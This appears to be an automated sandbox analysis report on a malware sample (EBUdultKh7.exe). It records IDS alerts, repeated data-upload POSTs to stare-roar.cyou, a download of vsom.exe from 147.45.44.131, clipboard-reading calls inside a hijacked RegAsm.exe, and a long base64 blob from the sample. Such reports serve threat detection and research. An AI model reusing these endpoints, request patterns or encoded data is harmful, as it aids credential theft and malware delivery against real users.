Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.78.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.78.149:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IZCLLOR8VQOQVJHGT9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AY68WG3LV3AIHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15050Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KUEO9L8QHDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20199Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=41NMUW4BQV5MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1LPXI41ABUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572079Host: stare-roar.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: stare-roar.cyou

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic

HTTP traffic detected: GET /infopage/vsom.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: stare-roar.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stare-roar.cyou

Source: EBUdultKh7.exe, 00000000.00000002.1416375255.00000000032CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: EBUdultKh7.exe, 00000000.00000002.1416375255.0000000003261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/vsom.exe
Source: EBUdultKh7.exe, 00000000.00000002.1416375255.0000000003261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/vsom.exeP
Source: EBUdultKh7.exe, 00000000.00000002.1416375255.00000000032CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1623376663.000000000127F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou/
Source: RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou//c
Source: RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou/1
Source: RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou/_b_=
Source: RegAsm.exe, 00000005.00000002.1623376663.000000000128D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou/api
Source: RegAsm.exe, 00000005.00000002.1623376663.00000000012DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou/pi
Source: RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou:443/api
Source: RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou:443/apil
Source: RegAsm.exe, 00000005.00000002.1623376663.000000000126A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stare-roar.cyou:443/apin.txtPK

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.149:443 -> 192.168.2.8:49715 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00432890 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_00432890

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00432890 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_00432890

System Summary

.NET source code contains very large strings

Source: EBUdultKh7.exe, Sap.cs

Long String: Length: 18812

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040E8DE	5_2_0040E8DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004269D0	5_2_004269D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00437A60	5_2_00437A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042C347	5_2_0042C347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043FB50	5_2_0043FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421B70	5_2_00421B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042CB27	5_2_0042CB27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043A330	5_2_0043A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042C33F	5_2_0042C33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040AC50	5_2_0040AC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00440420	5_2_00440420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00409CF0	5_2_00409CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004376D0	5_2_004376D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004237B0	5_2_004237B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00447055	5_2_00447055
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00406060	5_2_00406060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00425872	5_2_00425872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00403000	5_2_00403000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00413820	5_2_00413820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040C0F0	5_2_0040C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004370F0	5_2_004370F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043A8A0	5_2_0043A8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042F0A7	5_2_0042F0A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004240AC	5_2_004240AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00436974	5_2_00436974
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00440120	5_2_00440120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041E9E0	5_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427190	5_2_00427190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004161A0	5_2_004161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00408A70	5_2_00408A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00403A00	5_2_00403A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427A3A	5_2_00427A3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042E2C7	5_2_0042E2C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042AAF0	5_2_0042AAF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004302FA	5_2_004302FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00431AB1	5_2_00431AB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042934D	5_2_0042934D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00410350	5_2_00410350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00424350	5_2_00424350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E310	5_2_0043E310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004043C0	5_2_004043C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041E440	5_2_0041E440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00432460	5_2_00432460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E460	5_2_0043E460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043B400	5_2_0043B400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00406C20	5_2_00406C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043ACC0	5_2_0043ACC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00415CF0	5_2_00415CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041CC80	5_2_0041CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00418CAA	5_2_00418CAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00406540	5_2_00406540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00424511	5_2_00424511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00422D37	5_2_00422D37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B5C0	5_2_0041B5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427DD2	5_2_00427DD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E5D0	5_2_0043E5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004235E2	5_2_004235E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00405DFE	5_2_00405DFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00419599	5_2_00419599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00404DB0	5_2_00404DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040C640	5_2_0040C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042B644	5_2_0042B644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00426E60	5_2_00426E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041FE65	5_2_0041FE65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041A670	5_2_0041A670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042660F	5_2_0042660F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043A620	5_2_0043A620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043FE30	5_2_0043FE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E6D0	5_2_0043E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004226E0	5_2_004226E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00429E92	5_2_00429E92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00436E90	5_2_00436E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00412F5C	5_2_00412F5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00430700	5_2_00430700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041DF10	5_2_0041DF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00446F10	5_2_00446F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042DF2D	5_2_0042DF2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004097D0	5_2_004097D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004387D9	5_2_004387D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004207DD	5_2_004207DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040A7F0	5_2_0040A7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041E7A0	5_2_0041E7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004177A4	5_2_004177A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00415CE0 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004095E0 appears 46 times

Source: EBUdultKh7.exe, 00000000.00000002.1417120920.00000000062D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameypmbwesq.dll4 vs EBUdultKh7.exe
Source: EBUdultKh7.exe, 00000000.00000002.1416375255.0000000003304000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameypmbwesq.dll4 vs EBUdultKh7.exe
Source: EBUdultKh7.exe, 00000000.00000002.1415544553.000000000163E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs EBUdultKh7.exe
Source: EBUdultKh7.exe, 00000000.00000000.1384158446.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHilif.exe, vs EBUdultKh7.exe
Source: EBUdultKh7.exe	Binary or memory string: OriginalFilenameHilif.exe, vs EBUdultKh7.exe

Source: EBUdultKh7.exe, Pls.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
Source: EBUdultKh7.exe, Sap.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4